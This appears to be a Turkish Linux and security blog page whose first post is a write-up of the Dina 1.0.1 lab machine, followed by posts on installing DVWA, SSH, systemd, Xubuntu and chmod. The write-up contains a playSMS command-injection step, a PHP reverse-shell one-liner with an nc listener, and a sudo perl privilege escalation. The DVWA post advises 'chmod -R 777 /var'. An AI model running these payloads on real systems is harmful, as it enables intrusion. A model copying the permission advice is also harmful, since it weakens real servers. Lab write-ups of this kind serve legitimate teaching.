3 Mart 2018 Cumartesi

Dina 1.0.1 WriteupGoal: /root/flag.txt

Açıklamada yazıldığı üzere root dizini altındaki flag.txt dosyasına erişmemiz isteniyor.
O zaman zafiyetli makinamızın ip adresini bulalım.
Bu işlem için netdiscover aracını kullanacağız.


 netdiscover -i eth0 -r 192.168.1.0/24 


 Currently scanning: Finished! | Screen View: Unique Hosts      
 7 Captured ARP Req/Rep packets, from 4 hosts. Total size: 420     
 ___________________________________________________________________________ 
  IP   At MAC Address  Count  Len MAC Vendor / Hostname   
 ----------------------------------------------------------------------------- 
 192.168.1.41 00:0c:29:41:82:7d  2  120 VMware, Inc.     
 192.168.1.1  4c:9e:ff:xx:xx:xx  3  180 Zyxel Communications Corpora 

Hedef ip üzerinde bilgi edinmek, çalışan servislere göz atmak için nmap taraması yapalım.

 nmap -sSV -n -v 192.168.1.41 --open 

 Starting Nmap 7.40 ( https://nmap.org ) at 2018-03-03 23:47 +03 
 NSE: Loaded 40 scripts for scanning. 
 Initiating ARP Ping Scan at 23:47 
 Scanning 192.168.1.41 [1 port] 
 Completed ARP Ping Scan at 23:47, 0.03s elapsed (1 total hosts) 
 Initiating SYN Stealth Scan at 23:47 
 Scanning 192.168.1.41 [1000 ports] 
 Discovered open port 80/tcp on 192.168.1.41 
 Completed SYN Stealth Scan at 23:47, 0.10s elapsed (1000 total ports) 
 Initiating Service scan at 23:47 
 Scanning 1 service on 192.168.1.41 
 Completed Service scan at 23:47, 6.07s elapsed (1 service on 1 host) 
 NSE: Script scanning 192.168.1.41. 
 Initiating NSE at 23:47 
 Completed NSE at 23:47, 0.00s elapsed 
 Initiating NSE at 23:47 
 Completed NSE at 23:47, 0.00s elapsed 
 Nmap scan report for 192.168.1.41 
 Host is up (0.000089s latency). 
 Not shown: 999 closed ports 
 Some closed ports may be reported as filtered due to --defeat-rst-ratelimit 
 PORT STATE SERVICE VERSION 
 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) 
 MAC Address: 00:0C:29:41:82:7D (VMware) 

80. porttan yayın yaptığını görüyoruz. Tarayıcıdan girip göz atalım.Web uygulaması olduğu için Nikto ile zafiyet taraması yapalım.

 nikto -h http://192.168.1.41/ 


 - Nikto v2.1.6 
 --------------------------------------------------------------------------- 
 + Target IP:   192.168.1.41 
 + Target Hostname: 192.168.1.41 
 + Target Port:  80 
 + Start Time:   2018-03-03 23:53:32 (GMT3) 
 --------------------------------------------------------------------------- 
 + Server: Apache/2.2.22 (Ubuntu) 
 + Server leaks inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 16:46:52 2017 
 + The anti-clickjacking X-Frame-Options header is not present. 
 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS 
 + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type 
 + OSVDB-3268: /ange1/: Directory indexing found. 
 + Entry '/ange1/' in robots.txt returned a non-forbidden or redirect HTTP code (200) 
 + OSVDB-3268: /angel1/: Directory indexing found. 
 + Entry '/angel1/' in robots.txt returned a non-forbidden or redirect HTTP code (200) 
 + OSVDB-3268: /tmp/: Directory indexing found. 
 + Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200) 
 + OSVDB-3268: /uploads/: Directory indexing found. 
 + Entry '/uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200) 
 + "robots.txt" contains 5 entries which should be manually viewed. 
 + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. 
 + Uncommon header 'tcn' found, with contents: list 
 + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html 
 + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS  
 + OSVDB-3268: /secure/: Directory indexing found. 
 + OSVDB-3092: /tmp/: This might be interesting... 
 + OSVDB-3233: /icons/README: Apache default file found. 
 + 8351 requests: 0 error(s) and 20 item(s) reported on remote host 
 + End Time:   2018-03-03 23:54:00 (GMT3) (28 seconds) 
 --------------------------------------------------------------------------- 
 + 1 host(s) tested 


Dirb aracı ile de dizinlere bakalım.


 dirb http://192.168.1.41/ 

Bulduğumuz dizinleri incelemeye robots.txt ile başlayalım.

 ---- Scanning URL: http://192.168.1.41/ ---- 
 + http://192.168.1.41/cgi-bin/ (CODE:403|SIZE:288)         
 + http://192.168.1.41/index (CODE:200|SIZE:3618)         
 + http://192.168.1.41/index.html (CODE:200|SIZE:3618)        
 + http://192.168.1.41/robots (CODE:200|SIZE:102)         
 + http://192.168.1.41/robots.txt (CODE:200|SIZE:102)        
 ==> DIRECTORY: http://192.168.1.41/secure/           
 + http://192.168.1.41/server-status (CODE:403|SIZE:293)       
 ==> DIRECTORY: http://192.168.1.41/tmp/           
 ==> DIRECTORY: http://192.168.1.41/uploads/          
 ---- Entering directory: http://192.168.1.41/secure/ ---- nothing dizinini incelediğimizde sayfanın kaynak kodunda işimize yarar bilgiler buluyoruz.
Bu bilgileri bir yere not olarak bulduğumuz diğer dizinleri incelemeye devam edelim.

Dizinlere bakmaya secure ile devam ettiğimizde içinde secure backup.zip adlı dosyayı görüyoruz. Zipten çıkarmaya çalıştığımızda bizden parola istiyor.
 Az önce nothing dizininde bulduğumuz bilgileri deneyerek zipten çıkarıyoruz. parola:freedom

Zipten backup-cred.mp3 adlı bir dosya çıkıyor. 
File komutu ile incelediğimizde bir text dosyası olduğunu görüyoruz. 
( Linux'da dosya uzantılarının bir önemi yok ) cat ile dosyamızı okuyalım. I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file.... 
 uname: touhid 
 password: ****** 
 url : /SecreTSMSgatwayLogin 


Dosyayı okuduğumuzda bir dizin yoluna rastlıyoruz. 
Giriş yapmaya çalıştığımızda username ve password istiyor. 
username olarak touhid, parola olarakta nothing dizinindeki elde ettiğimiz bilgileri deniyoruz. 

parola:diana olarak giriş yapıyoruz.


playSMS adlı bir web uygulaması ile karşılaşıyoruz.

 Araştırmalarımız sonucunda komut çalıştırma zafiyetinin bulunduğunu görüyoruz.

https://www.exploit-db.com/exploits/42044/

Karşımıza çıkan panelde My Account sekmesinin altında Phonebook üzerinden dosya upload işlemi gerçekleştiriyoruz.

import.php dosyasında .csv uzantılı dosyaya payload’ı yazıp upload ediyoruz. Ardından user agent değerini çalıştıracağımız kod ile değiştiriyoruz. 
( Firefox üzerinde User-Agent switcher extensiondan yardım alarak yaptık )

Buraya atılan dosyanın formatı aşağıdaki gibi. Bu kısmın anlaşılması için yukardaki exploit-db linkinden detaylıca bakılması gerekiyor. 

User agent kısmını “uname -a” komutu ile değiştiriyoruz. 
Değişikliğin ardından test.csv dosyasını import ettiğimizde kod çalışıyor olacak.


Komutun çalıştığını görüyoruz. Şimdi yapamamız gerek reverse bağlantı yapıp oturum elde etmek. 
Bunun için alltaki payloadı kullanıyoruz.

php -r '$sock=fsockopen("192.168.1.41",4444);exec("/bin/sh -i <&3 >&3 2>&3");'v

Bu komut ile 192.168.1.41 adresinin 4444. portuna bağlan, /bin/sh üzerinden bağlantı alabiliyoruz.
Kendi cihazımızda ise dinleme duruma geçmemiz gerekiyor.
nc -lvp 4444 komutu ile 4444. porta gelen bağlanma isteklerini dinliyoruz.


 
www-data kullanıcı ile giriş yaptık. Okumamız gereken dosya /root dizini altında. 
Bu dizine erişebilmemiz için ya root haklarına sahip olmamız gerekiyor ya da root haklarına sahip bir kullanıcıya erişmemiz gerekiyor.


sudo -l komutu ile /etc/sudoers dosyasındaki yetkilendirilmiş kullanıcıları görüntülüyoruz.
Perl kullanıcısı parolasız olarak root yetkisi ile çalıştığını görüyoruz.
sudo perl -e ‘exec “cat /root/flag.txt”;’ komutu ile de root dizini altındaki flag dosyamıza erişebiliyoruz.


 


  

29 Haziran 2017 Perşembe

DVWA Kurulumu


DVWA, üzerinde web zafiyetlerini barındıran local olarak denemeler yapabileceğimiz açık kaynak kodlu bir yazılımdır.DVWA kurulumunu Ubuntu 16.10 sürümünde yapacağım. Kuruluma geçmeden önce sisteminizde LAMP ın kurulu olması gerekmektedir.

Kurulumu internette kolaylıkla bulunsada ben kurmaya çalıştığımda defalarca aynı hataları aldım. Tekrar karşılaşılması durumu içinde dökümantasyon oluşturmaya karar verdim. Umarım aynı durumla karşılaşanlar içinde faydalı olur.

--------

LAMP kurulu sistemimizde öncelikle apache2 ve mysql'in çalıştığından emin olmak için.

Komutları giriyoruz.


systemctl status apache2 

systemctl status mysql

Eğer ingilizce olarak kullanıyorsanız çıktılarda belirgin şekilde active(running) yazması gerekecektir.  deactive durumunda ise tekrar kontrol etmeniz gerekir.

DVWA   adresine tıklayarak Github'tan indirebilirsiniz. ya da git kullarak direk localhost'un çalıştığı dizini göstererek indirebilirsiniz.

İndirilen dosyayı  zip'ten çıkardıktan sonra /var/www/html içine klasör halinde atıyoruz.

Not: localhostta çalışırken olası izin hatalarıyla karşılamamak için dosyaları attıktan sonra /var dizinine recursive olarak bütün izinleri verelim.


chmod -R 777 /var


Daha sonra tarayıcıya localhost/DVWA-master yazdığımızda bize aşağıdaki uyarıyı verecek.


Bunun için :

cp /var/www/html/DVWA-master/config/config.inc.php.dist /var/www/html/DVWA-master/config/config.inc.phpDaha sonra vim kullanarak kopyalayıp yeniden isimlendirdiğimiz dosyanın içine giriyoruz.


vim /var/www/html/DVWA-master/config/config.inc.php
db_password kısmına mysql kurarken oluşturduğumuz parolayı giriyoruz.


Hemen aşağıda recaptcha_public_key  bölümü var. Üzerinde yorum satırı ile gösterilen google linkine tıklayıp gmail hesabımızı kullanarak kolaylıkla bir public key alabilirsiniz. İki adet key verecektir. Private olana ihtiyacımız yok. Yalnızca public key i bu bölüme yazıp kaydediyoruz.

( Bunları yapmadığınızda reCaptchaKey : Missing şeklinde bir uyarı veriyor )

Karşılaştığım hataları o an screenshot almadığım için yazarak anlatıyorum.

Daha sonra tekrardan localhost/DVWA-master dediğinizde setup ekranı karşınıza gelecektir. Normalde bu kısımda direk create database butonuna tıklayarak kurulumu yapıp yazılımı kullanabiliyorsunuz. Fakat ben yukardaki captcha hatası ve aşağıdaki diğer hataları aldığım için onlarında çözümlerini anlatacağım.


PHP function allow_url_include: Enabled

şeklinde bir uyarı veriyor. vim /etc/php/7.0/apache2/php.ini 

Bu hatayı çözmek için php.ini dosyamızda allow_url_include kısmını bulup Off olan kısmı On şeklinde düzeltiyoruz.

Daha sonra setup check ekranında

PHP module gd: Installed

diye bir hata daha veriyor. Bunun içinde php için gd kurulumu yapıyoruz. Php 7 sürümü için :


sudo apt-get install php-gd

Artık sorunsuz bir şekilde DVWA'yı kurmanız gerekir.


18 Şubat 2017 Cumartesi

Ubuntu SSH Kurulumu

SSH (Secure Shell )  : Güvenli veri iletimi için şifrelenmiş ağ protokolüdür. SSH ile bağlantı kuran cihazlar veri aktarımları ve diğer işlemleri şifrelenmiş bir ağ prokolü üzerinden yapar. SSH private key ve public key adında iki anahtar bulunur.

Yukardaki görselde iki client ve bir server bulunuyor. Clientlar private ve public iki adet anahtara sahip. .pub uzantılı dosya clientların public anahtarları. Diğer anahtarları ise private olanlar. Bağlanmak istediği sisteme public anahtarın taşınması gerekir. Private key'in ise bağlantıyı kuracağı sistemde bulunması gerekir. Digitalocean vs. sunucu hizmeti sağlayan yerlerden sunucu kiralamak istediğinizde sizden eğer şifresiz bağlanmak istiyorsanız, satın alırken public anahtarınızı soracaktır. Bu şekilde bağlantı kurmak kullancı adı şifre aşamasını ortadan kaldırır ve eğer birden fazla sunucu yönetiyorsanız hem daha pratik hem de güvenli bağlantı kurmanıza olanak sağlar. Bruteforce gibi saldırılarıda bu sayede engellemiş olursunuz.


SSH Servisi Kurulumu


 sudo apt-get install openssh-server 
 sudo apt-get install openssh-client 

Kurulum gerçekleştirdek sonra SSH Key oluşturmak için :

 ssh-keygen -t rsa 

komutu girilir. rsa diye yazılan keyin oluşturulurken kullanılan algoritma.

İlk olarak private key için konum soruyor. Default olarak bırakırsanız gösterdiği yerde oluşacaktır. Daha sonrası private key için bir parola soruyor. Eğer buraya bir parola girerseniz bağlantı yaparken private keyinizin parolasını size sorar.


 [root@hakan06 ~]# ssh-keygen -t rsa 
 Generating public/private rsa key pair. 
 Enter file in which to save the key (/root/.ssh/id_rsa):  
 Enter passphrase (empty for no passphrase):  
 Enter same passphrase again:  
 Your identification has been saved in /root/.ssh/id_rsa. 
 Your public key has been saved in /root/.ssh/id_rsa.pub. 
 The key fingerprint is: 
 52:7f:87:d3:70:97:cc:77:6d:3b:c5:b1:27:7f:c6:45 root@hakan06 
 The key's randomart image is: 
 +--[ RSA 2048]----+ 
 |    .E| 
 |    oo=| 
 |  . . o=@| 
 |  . . = *B| 
 |  . S . + oo=| 
 |  . . o .o| 
 |     | 
 |     | 
 |     | 
 +-----------------+ 

Private key /root/.ssh/id_rsa public key ise /root/.ssh/id_rsa_pub  dosyasıdır Cat komutu ile bu iki keyi görüntüleyebilirsiniz.

Burada ssh için ayar dosyası bulunmaktadır.


 hakan@h4kan:/etc/ssh$ cat /etc/ssh/sshd_config 

Buradan ssh için varsayılan ayarlar bulunmaktadır. Detaylıca incelemek için yukarıdaki kodu yazarak görüntüleyebilirsiniz.

12 Şubat 2017 Pazar

Linux sistemlerde systemd ile servislerin yönetimi


systemd : Görevi bilgisayardaki sistem ve servislerin çalışmasını organize etmektir. Init sisteminin yetersiz kalması sonucu geliştirilmektedir.

Linux sistemin açılışı


Klasik linux açılışı
 • init yapısı – Sıralama zorunluluğu
 • Bir servis başlamadan, ona ihtiyaç duyan sıradaki servis başlatılmaz.
 • -Birbirine bağlı servisler, soketler ile iletişim

systemd açılışı

Systemd, tüm hizmet ve servislerin ihtiyaç duyduğu bağlanma
noktalarını, ilgili hizmet başlamasa dahi önceden başlatır ve diğer
bekleyen programların sırada beklemesini ortadan kaldırır. Bu şekilde systemd birbirine bağlı servisleri birbirlerine ihtiyaç duymadan başlatır.

Debian, Oracle, RHEL, Suse gibi linux dağıtımları eski SystemV yerine default olarak systemd kullanmaya başladılar. Systemd, yalnızca açılış servislerinin düzenlenmesini üstlenen init sistemine göre daha karmaşık, servisleri paralel olarak çalıştırabilme, automount, journal, system state snapshot desteği gibi bir çok özellik barındırmaktadır.

Unit Files

Unit file default olarak "/etc/systemd/system/" dizini altında bulunur. Bu dizinlerde birbirinden farklı uzanntılara sahip bir çok dosya vardır. Bu uzantılar birbirinden farklı unit tiplerini gösterir. .service uzantısına sahip dosyalar servislere ait unit dosyaları tutar. .target uzantılı dosyalar site bir çok service unit'nin gruplanmış halini gösterir. .mount uzantılı dosyalar sisteme mount edilmesi istenilen disk bölümlerini için tanımlanmış configleri gösterirken. .swap uzantılı dosyalar ise swap alanları için yapılandırma dosyalarını içerir.


 root@h4kan:/home/hakan# cd /etc/systemd/ 
 root@h4kan:/etc/systemd# ls 
 bootchart.conf logind.conf resolved.conf system.conf  user 
 journald.conf network  system   timesyncd.conf user.conf 
 root@h4kan:/etc/systemd# cd system 
 root@h4kan:/etc/systemd/system# ls 
 bluetooth.target.wants      hybrid-sleep.target.wants 
 dbus-org.bluez.service      multi-user.target.wants 
 dbus-org.freedesktop.Avahi.service   network-online.target.wants 
 dbus-org.freedesktop.ModemManager1.service paths.target.wants 
 dbus-org.freedesktop.nm-dispatcher.service printer.target.wants 
 dbus-org.freedesktop.thermald.service  shutdown.target.wants 
 default.target.wants      sockets.target.wants 
 display-manager.service      sshd.service 
 display-manager.service.wants    suspend.target.wants 
 getty.target.wants       sysinit.target.wants 
 graphical.target.wants      syslog.service 
 hibernate.target.wants      timers.target.wants 
Servislerin systemd ile yönetilmesi

Servisleri yönetmek için yaygın olarak systemctl aracı kullanılır.

Sytnax : systemctl start | stop | restart | reload | status servisadi.service

# systemctl start <hiz_adı>: Hizmet başlatma

# systemctl stop <hiz_adı>: Hizmet durdurma

# systemctl restart <hiz_adı>: Hizmeti yeniden başlatma

# systemctl status <hiz_adı> : Hizmetin durumu gösterme

# systemctl enable <hiz_adı>: Otomatik başlatma

# systemctl disable <hiz_adı>: Otomatik başlatma iptali

# systemctl mask <hiz_adı>: Servisi elle başlatmayı engelleme

# systemctl unmask <hiz_adı>: Elle başlatma engelini kaldırma

Linux sistemlerde görevleri, hizmet süreçleri ( service / daemon ) yerine getirir. Hizmet programları UNIX’te “daemon” olarak adlandırılır. Ve daemonların adları d harfi ile biter. Örnek: httpd, sshd, syslogd, crond, proftpd..


Klasik linux sistemlerinde hizmet programlarının betikleri “/etc/rc.d/init.d” veya “/etc/init.d” dizinin altında tutulur. Bu betikler (start | stop | restart | status | status | configtest) parametreleri kullanılarak çalıştırılabilir. Bu yolla süreçlerin yönetimi yapılır.

Hizmet süreçlerinin daha kolay yapılması için systemctl kullanılır. Ben burada httpd servisi için systemctl kullanarak apache servisini kullanacağım.

systemctl list-units --type service komutu ile sistemdeki bütün servisleri görüntüleriz.

 hakan@h4kan:~$ systemctl list-units --type service 
 UNIT      LOAD ACTIVE SUB  DESCRIPTION 
 accounts-daemon.service  loaded active running Accounts Service 
 acpid.service    loaded active running ACPI event daemon 
 apache2.service    loaded active running LSB: Apache2 web server 
 ● apparmor.service   loaded failed failed LSB: AppArmor initialization 
 apport.service    loaded active exited LSB: automatic crash report  
 avahi-daemon.service  loaded active running Avahi mDNS/DNS-SD Stack 
 binfmt-support.service  loaded active exited Enable support for additiona 
 bluetooth.service   loaded active running Bluetooth service 
 console-setup.service  loaded active exited Set console font and keymap 
 cron.service    loaded active running Regular background program p 
 cups-browsed.service  loaded active running Make remote CUPS printers av 
 dbus.service    loaded active running D-Bus System Message Bus 
 getty@tty1.service   loaded active running Getty on tty1 
 grub-common.service   loaded active exited LSB: Record successful boot  
 hddtemp.service    loaded active exited LSB: disk temperature monito 
 irqbalance.service   loaded active running LSB: daemon to balance inter 
 keyboard-setup.service  loaded active exited Set console keymap 
 kmod-static-nodes.service loaded active exited Create list of required stat 
 lightdm.service    loaded active running Light Display Manager 
 lm-sensors.service   loaded active exited Initialize hardware monitori 
 ModemManager.service  loaded active running Modem Manager 
 mysql.service    loaded active running MySQL Community Server 
 lines 1-23...skipping... 
 UNIT      LOAD ACTIVE SUB  DESCRIPTION 
 accounts-daemon.service  loaded active running Accounts Service 
 acpid.service    loaded active running ACPI event daemon 
 apache2.service    loaded active running LSB: Apache2 web server 
 ● apparmor.service   loaded failed failed LSB: AppArmor initialization 
 apport.service    loaded active exited LSB: automatic crash report  
 avahi-daemon.service  loaded active running Avahi mDNS/DNS-SD Stack 
 binfmt-support.service  loaded active exited Enable support for additiona 
 bluetooth.service   loaded active running Bluetooth service 
 console-setup.service  loaded active exited Set console font and keymap 
 cron.service    loaded active running Regular background program p 
 cups-browsed.service  loaded active running Make remote CUPS printers av 
 dbus.service    loaded active running D-Bus System Message Bus 
 getty@tty1.service   loaded active running Getty on tty1 
 grub-common.service   loaded active exited LSB: Record successful boot  
 hddtemp.service    loaded active exited LSB: disk temperature monito 
 irqbalance.service   loaded active running LSB: daemon to balance inter 
 keyboard-setup.service  loaded active exited Set console keymap 
 kmod-static-nodes.service loaded active exited Create list of required stat 
 lightdm.service    loaded active running Light Display Manager 
 lm-sensors.service   loaded active exited Initialize hardware monitori 
 ModemManager.service  loaded active running Modem Manager 
 mysql.service    loaded active running MySQL Community Server 
 networking.service   loaded active exited Raise network interfaces 
 NetworkManager-wait-online.service loaded active exited Network Manager Wait Online 
 NetworkManager.service  loaded active running Network Manager 
 ondemand.service   loaded active exited LSB: Set the CPU Frequency S 
 polkitd.service    loaded active running Authenticate and Authorize U 
 rc-local.service   loaded active exited /etc/rc.local Compatibility 
 resolvconf.service   loaded active exited Nameserver information manag 
 rsyslog.service    loaded active running System Logging Service 
 rtkit-daemon.service  loaded active running RealtimeKit Scheduling Polic 
 setvtrgb.service   loaded active exited Set console scheme 
 snapd.service    loaded active running Snappy daemon 
 speech-dispatcher.service loaded active exited LSB: Speech Dispatcher 

Yukardaki çıktıda sadece aktif servisleri görüntüledik. Yazdığımız komuta ek olarak all parametresi ekleyerek tüm servisleri görüntüleriz.


systemctl list-units --type service --all inactive durumundaki servisleride görüntüleyebiliriz.

 hakan@h4kan:~$ systemctl list-units --type service --all 
 UNIT            LOAD  ACTIVE SUB  DESCRIPTION 
 accounts-daemon.service        loaded active running Accounts Service 
 acpid.service          loaded active running ACPI event daemon 
 alsa-restore.service        loaded inactive dead Save/Restore Sound Card State 
 alsa-state.service         loaded inactive dead Manage Sound Card State (restore and store) 
 anacron.service          loaded inactive dead Run anacron jobs 
 apache2.service          loaded active running LSB: Apache2 web server 
 ● apparmor.service         loaded failed failed LSB: AppArmor initialization 
 apport.service          loaded active exited LSB: automatic crash report generation 
 apt-daily.service         loaded inactive dead Daily apt activities 
 ● auditd.service          not-found inactive dead auditd.service 
 avahi-daemon.service        loaded active running Avahi mDNS/DNS-SD Stack 
 binfmt-support.service        loaded active exited Enable support for additional executable binary formats 
 bluetooth.service         loaded active running Bluetooth service 
 brltty.service          loaded inactive dead Braille Device Support 
 ● cloud-init.service         not-found inactive dead cloud-init.service 
 ● console-screen.service        not-found inactive dead console-screen.service 
 console-setup.service        loaded active exited Set console font and keymap 
 cron.service          loaded active running Regular background program processing daemon 
 cups-browsed.service        loaded active running Make remote CUPS printers available locally 
 cups.service          loaded inactive dead CUPS Scheduler 
 dbus.service          loaded active running D-Bus System Message Bus 
 dns-clean.service         loaded inactive dead Clean up any mess left by 0dns-up 
 emergency.service         loaded inactive dead Emergency Shell 
 failsafe-x.service         loaded inactive dead X.org diagnosis failsafe 
 ● festival.service         not-found inactive dead festival.service 
 friendly-recovery.service       loaded inactive dead Recovery mode menu 
 getty-static.service        loaded inactive dead getty on tty2-tty6 if dbus and logind are not available 
 getty@tty1.service         loaded active running Getty on tty1 
 getty@tty7.service         loaded inactive dead Getty on tty7 
 gpu-manager.service         loaded inactive dead Detect the available GPUs and deal with any system changes 

systemctl list-unit-files --type service servislerin enable, disable durumunu görmek için bu komutu kullanırız.

 hakan@h4kan:~$ systemctl list-unit-files --type service 
 UNIT FILE         STATE  
 accounts-daemon.service     enabled  
 acpid.service        disabled 
 alsa-restore.service      static  
 alsa-state.service       static  
 alsa-utils.service       masked  
 anacron-resume.service      enabled  
 anacron.service       enabled  
 apport-forward@.service     static  
 apt-daily.service       static  
 autovt@.service       enabled  
 avahi-daemon.service      enabled  
 binfmt-support.service      enabled  
 bluetooth.service       enabled  
 bootlogd.service       masked  
 bootlogs.service       masked  
 bootmisc.service       masked  
 brltty-udev.service      static  
 brltty.service        enabled  
 checkfs.service       masked  
 checkroot-bootclean.service    masked  
 checkroot.service       masked  
 colord.service        static  
 console-getty.service      disabled 
 console-setup.service      static  
 console-shell.service      disabled 
 container-getty@.service     static  
 cron.service        enabled  
 cryptdisks-early.service     masked  
 cryptdisks.service       masked  
 cups-browsed.service      enabled  
 cups.service        enabled  
 dbus-org.bluez.service      enabled  
 dbus-org.freedesktop.Avahi.service   enabled  
 dbus-org.freedesktop.hostname1.service  static  
 dbus-org.freedesktop.locale1.service  static  
 dbus-org.freedesktop.login1.service  static  
 dbus-org.freedesktop.ModemManager1.service enabled  
 dbus-org.freedesktop.network1.service  disabled 
 dbus-org.freedesktop.nm-dispatcher.service enabled  

Herhangi bir servisin durumunu öğrenmek içinde

systemctl status apache2 komutunu kullanırız. Ben apache2 servisinin durumuna bakıyorum.


 hakan@h4kan:~$ systemctl status apache2 
 ● apache2.service - LSB: Apache2 web server 
  Loaded: loaded (/etc/init.d/apache2; bad; vendor preset: enabled) 
 Drop-In: /lib/systemd/system/apache2.service.d 
    └─apache2-systemd.conf 
  Active: active (running) since Paz 2017-02-12 14:49:12 +03; 57min ago 
  Docs: man:systemd-sysv-generator(8) 
 Process: 1645 ExecStart=/etc/init.d/apache2 start (code=exited, status=0/SUCCESS) 
  CGroup: /system.slice/apache2.service 
    ├─1781 /usr/sbin/apache2 -k start 
    ├─1809 /usr/sbin/apache2 -k start 
    ├─1810 /usr/sbin/apache2 -k start 
    ├─1811 /usr/sbin/apache2 -k start 
    ├─1812 /usr/sbin/apache2 -k start 
    └─1813 /usr/sbin/apache2 -k start 
 Şub 12 14:49:11 h4kan systemd[1]: Starting LSB: Apache2 web server... 
 Şub 12 14:49:11 h4kan apache2[1645]: * Starting Apache httpd web server apache2 
 Şub 12 14:49:12 h4kan apache2[1645]: * 
 Şub 12 14:49:12 h4kan systemd[1]: Started LSB: Apache2 web server. 

Çıktıda görebileceğiniz gibi servisin loaded olduğu, servise ait unit file’ın tam path’inin/usr/lib/systemd/system/apache2.service.d olduğu ve startup’a ekli olduğu (enabled) görüntülenmektedir.

Ayrıca, servisin state’inin active (running) olduğu ve ne kadardır up olduğu bildirilmektedir. Main PID numarası Linux Control Group bilgileri ve servisin ürettiği logun son bir kısmı yer bildirilmektedir.

Servisi başlatmak için

#systemctl start httpd

servisi durdurmak için

#systemctl stop httpd

Servisi reload etmek için

#systemctl reload httpd 

Servisi restart etmek için

#systemctl restart httpd

Servislerin açılışta çalıştırılması için

#systemctl enable httpd 

servisin açılışta çalıştırılmaması için yani startuptan kaldırmak için

#systemctl disable httpd

Enable ettiğiniz bir servisin tekrar başlatılmaması için mask parametresi kullanılır.

#systemctl mask httpd 

maskı kaldırmak içinde unmask parametresi kullanılır.

#systemctl unmask httpd
  

Özetlersek systemd, Linux işletim sistemleri için geliştirilmiştir.
Amacı; bilgisayardaki sistem ve servislerin çalışmasını organize etmektir. systemd tabiki bununla kalmıyor ve çok fazla işlevi var. Ben genel hatlarıyla anlatmaya çalıştım.  

9 Şubat 2017 Perşembe

Ubuntu sistemi xubuntu yapmak

Ubuntu gnome masaüstü ortamını bir kaç adımda xubuntu hale getirebiliyoruz.

Terminalde : xubuntu deski indiriyoruz.

 sudo apt-get install xubuntu-desktop gksu leafpad synaptic  

Paket kurulduktan sonra, sisteminizden log-out olmanız gerekir. Olduktan sonra sağ üstteki ubuntu logosuna tıklayıp xubuntu yapın.

xubuntu şeklinde giriş yaptıktan sonra, gnome ile ilgili problemlerin çıkmaması adına bazı paketleri siliyoruz.

 sudo apt-get remove nautilus gnome-power-manager gnome-screensaver gnome-termina* gnome-pane* gnome-applet* gnome-bluetooth gnome-desktop* gnome-sessio* gnome-user* gnome-shell-common compiz compiz* unity unity* hud zeitgeist zeitgeist* python-zeitgeist libzeitgeist* activity-log-manager-common gnome-control-center gnome-screenshot overlay-scrollba* && sudo apt-get install xubuntu-community-wallpapers && sudo apt-get autoremove 

Bu işlem bittikten sonra sistemi reboot ediyoruz.

Yukardaki işlem bizim bazı sorunları almamızı engelledi fakat gnome yazılımıda bu işlemde istemeden silindi. Yazılım deposunu tekrar almak için :


 sudo apt-get install gnome-software 

Sisteminiz xubuntuya döndü. Xubuntuyu eklentilerle daha güzel bir hale getirmeniz için https://sites.google.com/site/easylinuxtipsproject/first-xubuntu ziyaret edebilirsiniz.

21 Mayıs 2016 Cumartesi

Linux chmod, chown komutları

chmod : Dosya ve dizinlerin izinlerini değiştirmek için kullanılır.

Örnek :

dosya1 ve bir dizin oluştururuz. izinleri aşağıdaki gibidir.

drwxr-xr-x 2 root root 4096 May 19 00:59 dizin1/
-rw-r--r-- 1 root root  0 May 19 00:59 dosya1

rwx = 111 in binary = 7
rw- = 110 in binary = 6
r-x = 101 in binary = 5
r-- = 100 in binary = 4


şeklindedir. ve biz bunları 755 olarak değiştirmek istiyoruz.

hakan eren # touch dosya1
hakan eren # mkdir dizin1
hakan eren # ll
total 40
drwxr-xr-x 5 root root 4096 May 19 00:59 ./
drwx------ 26 root root 4096 May 18 04:42 ../
drwxr-xr-x 2 root root 4096 May 19 00:59 dizin1/
-rw-r--r-- 1 root root  0 May 19 00:59 dosya1
-rw-r--r-- 1 root root  0 May 16 05:00 ornek1.html
drwxr-xr-x 2 root root 4096 May 17 02:11 ornek2/
drwxr-xr-x 2 root root 4096 May 17 02:11 ornek3/
-rw-r--r-- 1 root root  31 May 17 02:12 ornek4
-rw-r--r-- 1 root root  29 May 17 02:20 ornek5
-rw-r--r-- 1 root root  23 May 17 02:22 ornek7
-rw-r--r-- 1 root root  31 May 17 02:23 ornek8
-rw-r--r-- 1 root root  31 May 17 02:22 ornek9
hakan eren # chmod 755 dosya1
hakan eren # ll
total 40
drwxr-xr-x 5 root root 4096 May 19 00:59 ./
drwx------ 26 root root 4096 May 18 04:42 ../
drwxr-xr-x 2 root root 4096 May 19 00:59 dizin1/
-rwxr-xr-x 1 root root  0 May 19 00:59 dosya1*
-rw-r--r-- 1 root root  0 May 16 05:00 ornek1.html
drwxr-xr-x 2 root root 4096 May 17 02:11 ornek2/
drwxr-xr-x 2 root root 4096 May 17 02:11 ornek3/
-rw-r--r-- 1 root root  31 May 17 02:12 ornek4
-rw-r--r-- 1 root root  29 May 17 02:20 ornek5
-rw-r--r-- 1 root root  23 May 17 02:22 ornek7
-rw-r--r-- 1 root root  31 May 17 02:23 ornek8
-rw-r--r-- 1 root root  31 May 17 02:22 ornek9


en baştaki 7 sahibi ile ilgili ortadaki grubu en sondaki diğerleri ile ilgili izinleri belirtiriz.

Aynı işlemi sayısal ifadelerle yapabileceğimiz gibi sembolik ifadelerlede kullanabiliriz.

chmod o-x dosya1 dediğimizde dosya1'den çalışma iznini diğer userlardan siler. o parametresi other anlamında kullanılır.


hakan eren # chmod o-x dosya1
hakan eren # ll
total 40
drwxr-xr-x 5 root root 4096 May 19 00:59 ./
drwx------ 26 root root 4096 May 18 04:42 ../
drwxr-xr-x 2 root root 4096 May 19 00:59 dizin1/
-rwxr-xr-- 1 root root  0 May 19 00:59 dosya1*


